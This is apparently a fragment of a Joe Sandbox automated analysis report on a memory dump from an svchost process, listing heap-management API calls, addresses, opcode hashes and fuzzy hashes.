                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 471586229-0
                                                                                                                                                                                                                • Opcode ID: 8e819371a3761d7a6feb6aee09c8642a3b78063315fc6819a73625fae7bf1feb
                                                                                                                                                                                                                • Instruction ID: 86bd58d85499fdb0b43b02d3471e19ef307744f38e3941d0e48ec581af613212
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e819371a3761d7a6feb6aee09c8642a3b78063315fc6819a73625fae7bf1feb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A50147326406066BD3228B6CDC48FABB79DEF42750F004315F9849B340EB21EC0587E0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-05ADF5B5,?,?,00000000,?,02D2F31A,?,?,-05ADF5C8,00000000,00000000), ref: 02D2F0E8
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D2F31A,?,?,-05ADF5C8,00000000,00000000), ref: 02D2F0EF
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2F0FF
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D2F10A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 471586229-0
                                                                                                                                                                                                                • Opcode ID: 64e435b9ad5dd333465d3f5e3bbf984072e5e8aefa95dfd13d60005b79e27be0
                                                                                                                                                                                                                • Instruction ID: 20776dd33be424962c2bcd1fada20033ce04ca55fe5ad88f153db83fffb0b451
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64e435b9ad5dd333465d3f5e3bbf984072e5e8aefa95dfd13d60005b79e27be0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F0E5736416213BC6226B99EC89F9B77ACEB97B64F804515FA04EB341CA20DD1487F0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,74DEF380,?,02D2E5D9,?,00000000,?,02D2FCAC), ref: 02D2E1E4
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02D2FCAC), ref: 02D2E1E7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02D2FCAC), ref: 02D2E1F4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02D2FCAC), ref: 02D2E1F7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1670920773-0
                                                                                                                                                                                                                • Opcode ID: c64f72be596c969dbf14858409846151556cf5e073b8e6b859d8a156104627ce
                                                                                                                                                                                                                • Instruction ID: 9d9aea647dbc6ee1f4927a1b25ccbfc0bdc64181aee4f52ca89cc8b69dae1ba5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c64f72be596c969dbf14858409846151556cf5e073b8e6b859d8a156104627ce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F039709412326AEB505B39A888B9BB79DAF69699F900450E408D7300EB25EC54DAB0